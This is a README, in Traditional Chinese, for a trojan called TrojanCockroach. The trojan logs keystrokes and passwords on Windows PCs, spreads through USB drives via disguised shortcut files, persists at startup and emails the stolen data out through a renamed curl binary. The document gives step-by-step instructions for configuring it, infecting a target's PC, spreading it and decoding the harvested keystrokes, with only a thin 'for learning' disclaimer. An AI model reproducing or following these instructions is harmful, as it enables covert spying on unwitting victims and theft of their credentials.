TrojanCockroach

您正在看到一種特洛伊病毒，它從 PC（Windows XP 或更高版本）竊取資料（ID、密碼；每次按鍵），然後透過電子郵件將其發送回給您。它透過 USB 驅動器在 PC 之間傳播，任何防毒軟體幾乎無法檢測到。

僅出於學習目的而創建。

• TrojanCockroach.cpp - 記錄使用者數據，透過 Transmit.exe 發送數據，感染可攜式磁碟機。
• Infect.cpp-將病毒從可攜式驅動器安裝到電腦中。
• Transmit.exe - 透過電子郵件傳回資料。
• TrojanCockroach.lnk-駐留在PC的啟動資料夾中並啟動TrojanCockroach.exe。
• Infect.lnk - 在受感染的便攜式磁碟機中採用不同的有吸引力的名稱，點擊時啟動 Infect.exe。
• DecodeMessage.cpp-用於解碼收到的電子郵件。

1. 準備
   
   1. 從這裡下載完整的套件。
   
   
   2. 更改 TrojanCockroach.cpp 的sendData()方法 - 將您的電子郵件和密碼放入命令中。
   
   
   3. 編譯TrojanCockroach.cpp和Infect.cpp 。 Transmit.exe其實是Windows下curl的可執行發行版。
   
   
   4. 將TrojanCockroach.exe 、 Infect.exe 、 Transmit.exe 、 Infect.lnk和TrojanCockroach.lnk放在同一資料夾中。這就是他們的樣子——
   
   
   5. 現在運行TrojanCockroach.exe ，然後插入 USB 隨身碟（看看神奇吧！）。您將在隨身碟中獲得一個隱藏資料夾和連結檔案。隱藏資料夾包含完整包，連結檔案實際上以 Infect.lnk 的形式重新命名。


2. 攻擊
   
   1. 將 USB 隨身碟插入物件的 PC（是的，您必須從某個地方開始傳播過程！）。運行Infect.lnk，間諜軟體將被注入。
   
   
   2. 重啟後syware就會被啟動。現在（重新啟動後）每次將任何 USB 驅動器插入受影響的 PC 時，病毒都會在其中複製自身，並且循環將再次開始。


3. 數據收集
   
   1. 您需要等待幾天（取決於電腦開關機的次數），才能取得任何資料。
   
   
   2. 收到電子郵件後，將完整訊息複製到文字檔案中。
      當訊息透過電子郵件發送時，某些字元會被轉換。解決這個問題——————。
   
   
   3. 現在，執行DecodeMessage.exe將訊息解碼為純文字。
      在此階段，您可以在文字中尋找特定模式，從而消除大部分無用部分（例如滑鼠點擊或遊戲過程中發生的相同按鍵組按下）。

您可以閱讀 TrojanCockroachStory 以了解程式的工作原理。您將從專案前期StupidKeyLogger中對該專案有更清晰的了解。

該項目完全可以運行。但是，我不希望新手濫用我的專案。所以，我保守了一些簡單的秘密。本「自述文件」中也存在一些故意製造的漏洞。我也在程式碼中做了一些無意義的更改；因此，沒有人能夠在不弄髒自己的手的情況下有效地運行它。我相信這些簡單的障礙可以被真正的程式設計師輕鬆克服:)

注意：我不會對其他人對該程序的不當行為承擔任何責任。但我相信真正的學習者會從中學到很多。

Trojan Cockroach 已根據 MIT 許可證獲得許可。